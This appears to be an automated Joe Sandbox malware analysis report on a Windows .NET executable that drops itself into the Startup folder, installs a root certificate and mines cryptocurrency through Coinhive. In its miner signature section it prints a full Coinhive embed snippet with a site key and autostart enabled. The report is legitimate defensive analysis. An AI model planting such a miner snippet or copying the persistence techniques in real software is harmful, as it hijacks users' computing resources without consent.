
Analysis Report

Overview

General Information

Joe Sandbox Version: 21.0.0
Analysis ID: 472036
Start time: 13:31:50
Joe Sandbox Product: Cloud
Start date: 03.01.2018
Overall analysis duration: 0h 7m 59s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Fc4oWdmbpJ (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
Detection: MAL
Classification: mal56.adwa.mine.winEXE@6/28@11/6
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, WMIADAP.exe, WmiApSrv.exe, mscorsvw.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: Fc4oWdmbpJ.exe, windata0.exe


Detection

Strategy: Threshold
Score: 56
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious


Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview



Bitcoin Miner:

Configures the Internet Explorer emulation mode (likely to run Javascript)
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Registry value created: HKEY_USERS\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION Fc4oWdmbpJ.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | Registry value created: HKEY_USERS\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION windata0.exe
Found strings related to Crypto-Mining
Source: Fc4oWdmbpJ.exe | String found in binary or memory: <script src="https://coinhive.com/lib/miner.min.js" async></script><div class="coinhive-miner" style="width: 256px; height: 310px"data-key="9WWU5nzJXu1rB3gO3Or4atRpOQlqsodr"data-autostart="true"data-whitelabel="false"data-background="#000000"data-text="#eeeeee"data-action="#00ff00"data-graph="#555555"data-threads="1"data-throttle="0"data-start="Start Now!"><em>Please disable Adblock!</em></div>

Networking:

Downloads files
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0SCE2KB1\miner.min[1].js
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: coinhive.com
Urls found in memory or binary data
Source: 1BB09BEEC155258835C193A7AA85AA5B_40844D66CCA168B7287809F3A3E01D19.2.dr, 1BB09BEEC155258835C193A7AA85AA5B_40844D66CCA168B7287809F3A3E01D19.7.dr | String found in binary or memory: http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6
Source: 5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.2.dr, 5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.7.dr | String found in binary or memory: http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8h
Source: 5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.2.dr, 5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.7.dr | String found in binary or memory: http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xC
Source: miner.min[1].js.2.dr, miner.min[1].js.7.dr | String found in binary or memory: https://authedmine.com/authenticate.html
Source: miner.min[1].js.2.dr, miner.min[1].js.7.dr | String found in binary or memory: https://coinhive.com/captcha/
Source: miner.min[1].js.2.dr, miner.min[1].js.7.dr | String found in binary or memory: https://coinhive.com/lib/
Source: windata0.exe.2.dr | String found in binary or memory: https://coinhive.com/lib/miner.min.js
Source: miner.min[1].js.2.dr, miner.min[1].js.7.dr | String found in binary or memory: https://coinhive.com/media/miner.html
Uses HTTPS

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Drops certificate files (DER)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1BB09BEEC155258835C193A7AA85AA5B_40844D66CCA168B7287809F3A3E01D19
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4

System Summary:

Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
PE file contains a COM descriptor data directory
Source: Fc4oWdmbpJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Fc4oWdmbpJ.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directory
Source: Fc4oWdmbpJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbols
Source: Binary string: C:\Users\Cyb3rNuX\Documents\Visual Studio 2010\Projects\d4eade42751d70b2eee7875ce3635c7b\d4eade42751d70b2eee7875ce3635c7b\obj\x86\Debug\d4eade42751d70b2eee7875ce3635c7b.pdb | source: Fc4oWdmbpJ.exe, windata0.exe.2.dr
Classification label
Source: classification engine | Classification label: mal56.adwa.mine.winEXE@6/28@11/6
Creates files inside the user directory
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe
Launches a second explorer.exe instance
Source: unknown | Process created: C:\Windows\explorer.exe
Source: unknown | Process created: C:\Windows\explorer.exe
PE file has an executable .text section and no other executable section
Source: Fc4oWdmbpJ.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application use the .NET runtime (probably coded in C#)
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Reads ini files
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\Fc4oWdmbpJ.exe 'C:\Users\user\Desktop\Fc4oWdmbpJ.exe'
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe'
Source: unknown | Process created: C:\Windows\System32\cmd.exe unknown
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe'
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32
PE file contains strange resources
Source: Fc4oWdmbpJ.exe | Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: windata0.exe.2.dr | Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Reads the hosts file
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample file name differs from the original file name gathered from version info
Source: Fc4oWdmbpJ.exe | Binary or memory string: OriginalFilenamed4eade42751d70b2eee7875ce3635c7b.exed! vs Fc4oWdmbpJ.exe
Sample reads its own file content
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | File read: C:\Users\user\Desktop\Fc4oWdmbpJ.exe
Searches for the Microsoft Outlook file path
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe
Installs new ROOT certificates
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Boot Survival:

Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe\:Zone.Identifier:$DATA
Drops PE files to the startup folder
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries a list of all running processes
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Process information queried: ProcessInformation
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 3852 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3876 | Thread sleep time: -60000s >= -60000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe TID: 3960 | Thread sleep time: -120000s >= -60000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe TID: 3960 | Thread sleep time: -60000s >= -60000s

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Memory allocated: page read and write and page guard
Checks for debuggers (devices)
Source: C:\Windows\explorer.exe | File opened: C:\Windows\WinSxS\FileMaps\users_user_appdata_roaming_microsoft_windows_start_menu_programs_startup_8dae6c61b8a77b32.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | System information queried: KernelDebuggerInformation
Enables debug privileges
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | Process token adjusted: Debug

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the volume information (name, serial number etc.) of a device
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Queries volume information: C:\Users\user\Desktop\Fc4oWdmbpJ.exe VolumeInformation
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the Internet feature controls of Internet Explorer
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exe | Registry value created: HKEY_USERS\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe | Registry value created: HKEY_USERS\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph ID: 472036
Sample: Fc4oWdmbpJ
Startdate: 03/01/2018
Architecture: WINDOWS
Score: 56
Root signature: Found strings related to Crypto-Mining
Processes started from the sample: Fc4oWdmbpJ.exe; explorer.exe (two instances); cmd.exe
Process started by explorer.exe: windata0.exe
DNS/IP info for Fc4oWdmbpJ.exe: coinhive.com; ws009.coinhive.com 136.243.89.209, port 443 (client ports 49174, 49183), HETZNER-ASDE Germany; 5 other IPs or domains
Files dropped by Fc4oWdmbpJ.exe: C:\Users\...\windata0.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\...\windata0.exe (PE32)
Signatures for Fc4oWdmbpJ.exe: Installs new ROOT certificates; Drops PE files to the startup folder; Configures the Internet Explorer emulation mode (likely to run Javascript)
DNS/IP info for windata0.exe: coinhive.com; ws010.coinhive.com 94.130.129.247, port 443 (client port 49180), HETZNER-ASDE Germany; 2 other IPs or domains
Signatures for windata0.exe: Configures the Internet Explorer emulation mode (likely to run Javascript)

Simulations

Behavior and APIs

Time: 13:36:17 | Type: Autostart | Description: Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot